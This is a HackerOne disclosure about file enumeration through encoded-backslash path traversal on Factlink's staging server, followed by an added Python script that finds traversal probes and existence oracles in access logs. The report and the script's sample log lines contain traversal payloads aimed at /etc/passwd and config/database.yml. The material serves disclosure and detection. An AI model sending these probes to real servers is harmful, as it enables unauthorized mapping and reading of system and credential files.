Factlink: File name/folder enumeration.

2014-11-14T05:30:18
ID H1:35823
Type hackerone
Reporter nahamsec
Modified 2014-11-18T08:44:01

Description

Hello, an attacker may be able to map your server and find configuration file names by the following method:

Valid attempt (Not found): https://staging.factlink.com/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

Invalid attempt (404): https://staging.factlink.com/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd_Nonexistant
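The defensive point of this report is the response differential: the encoded backslash (`%5C`) traversal is itself a signal, but what makes it an enumeration oracle is that an existing target draws a different response than a nonexistent one. The following is an added example, not code from the report, from nahamsec or from Factlink. It assumes Common Log Format access logs and uses constructed sample lines; the status codes (200 for the application "Not found" page, 404 for the true miss) are assumptions chosen to reproduce the differential the report describes.

```python
"""Detect path-traversal probes and file-existence oracles in web access logs."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log lines in Common Log Format (not real Factlink logs).
# The first pair mirrors the report: the existing-file probe gets an
# application-level "Not found" page (assumed HTTP 200), the nonexistent-file
# probe gets a real HTTP 404. The other IPs are constructed for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Nov/2014:05:30:18 +0000] "GET /%5C../%5C../%5C../etc/passwd HTTP/1.1" 200 1834
10.0.0.5 - - [14/Nov/2014:05:30:19 +0000] "GET /%5C../%5C../%5C../etc/passwd_Nonexistant HTTP/1.1" 404 162
10.0.0.7 - - [14/Nov/2014:05:31:02 +0000] "GET /assets/app.css HTTP/1.1" 200 5120
10.0.0.9 - - [14/Nov/2014:05:32:40 +0000] "GET /..%2F..%2Fconfig/database.yml HTTP/1.1" 404 162
10.0.0.9 - - [14/Nov/2014:05:32:41 +0000] "GET /images/%252e%252e/secret HTTP/1.1" 404 162
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)


def normalize_path(raw):
    """Percent-decode until stable (catches %252e double encoding) and fold
    backslashes to slashes so %5C.. is treated the same as ../."""
    decoded = raw
    for _ in range(4):  # bounded loop: real requests are rarely encoded more than twice
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/")


def is_traversal(raw_path):
    """True when any path segment, after normalization, is exactly '..'."""
    path_only = normalize_path(raw_path).split("?", 1)[0]
    return ".." in path_only.split("/")


def find_traversal_attempts(log_text):
    """Return a record for every parsable request whose path contains traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than crash the pipeline
        if is_traversal(m["path"]):
            hits.append({
                "ip": m["ip"],
                "path": m["path"],
                "normalized": normalize_path(m["path"]),
                "status": int(m["status"]),
            })
    return hits


def existence_oracle_sources(hits):
    """IPs whose traversal probes drew more than one distinct status code.

    That differential (an application 'Not found' page versus a plain 404)
    is what lets a client tell existing files from missing ones, so it is
    the signal worth alerting on, not the traversal string alone.
    """
    statuses = defaultdict(set)
    for h in hits:
        statuses[h["ip"]].add(h["status"])
    return sorted(ip for ip, codes in statuses.items() if len(codes) > 1)


if __name__ == "__main__":
    attempts = find_traversal_attempts(SAMPLE_LOG)
    for a in attempts:
        print(f'{a["ip"]} {a["status"]} {a["path"]} -> {a["normalized"]}')
    print("oracle candidates:", existence_oracle_sources(attempts))
```

On the sample input, four requests are flagged as traversal, and only 10.0.0.5 is reported as an oracle source, because its two probes received different status codes. The normalization step matters more than the regex: a rule that matches only the literal `../` misses the `%5C../` form in the report and the double-encoded `%252e%252e` form, while decoding to a fixed point and folding backslashes catches all three. The corresponding server-side fix is to make the response for a traversal-rejected path indistinguishable from that for any other missing path.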